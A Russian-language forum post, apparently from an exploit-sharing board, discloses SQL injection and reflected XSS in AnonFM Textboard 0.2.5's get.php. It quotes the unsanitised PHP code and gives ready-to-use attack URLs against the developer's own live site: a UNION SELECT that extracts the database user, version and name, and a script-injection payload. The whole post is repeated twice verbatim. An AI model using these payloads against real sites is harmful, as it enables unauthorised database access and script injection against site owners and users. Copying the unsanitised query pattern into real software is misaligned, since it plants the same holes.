Ded MustD!e
16.09.2009, 07:47
Уязвимость: SQL-Inj & pXSS
Продукт: AnonFM Textboard
Версия: 0.2.5
Уязвимый файл get.php
Код:
...
$postid1 = $_GET['id'];
...
$postquery = mysql_query("SELECT message,number,postid FROM threads WHERE postid=$postid1");
$queryresult = mysql_fetch_array($postquery);
if ($queryresult == '') { }
else {
$postid = $queryresult['postid'];
echo " <td class=\"tdb1\" id=\"a" . $queryresult['number'] . "\">" . $queryresult['message'] . "</td>\n";
echo " <td class=\"tdb12\"><a class=\"green\">#" . $queryresult['number'] . "</a> (<a class=\"ilnk\" href=\"mod.php?post=0&id=$postid&postid=$postid\">Mod</a>)<br />ID: $postid1</td>";
}
Пример на сайте разработчика:
SQL:
http://www.avuc.nl/c/get.php?id=-1+union+select+concat_ws(0x3a,user(),version(),dat abase()),2,3--+
XSS:
http://www.avuc.nl/c/get.php?id=1252679693%22%3E%3Cscript%3Ealert()%3C/script%3E
Пассивки там вообще везде...
Продукт: AnonFM Textboard
Версия: 0.2.5
Уязвимый файл get.php
Код:
...
$postid1 = $_GET['id'];
...
$postquery = mysql_query("SELECT message,number,postid FROM threads WHERE postid=$postid1");
$queryresult = mysql_fetch_array($postquery);
if ($queryresult == '') { }
else {
$postid = $queryresult['postid'];
echo " <td class=\"tdb1\" id=\"a" . $queryresult['number'] . "\">" . $queryresult['message'] . "</td>\n";
echo " <td class=\"tdb12\"><a class=\"green\">#" . $queryresult['number'] . "</a> (<a class=\"ilnk\" href=\"mod.php?post=0&id=$postid&postid=$postid\">Mod</a>)<br />ID: $postid1</td>";
}
Пример на сайте разработчика:
SQL:
http://www.avuc.nl/c/get.php?id=-1+union+select+concat_ws(0x3a,user(),version(),dat abase()),2,3--+
XSS:
http://www.avuc.nl/c/get.php?id=1252679693%22%3E%3Cscript%3Ealert()%3C/script%3E
Пассивки там вообще везде...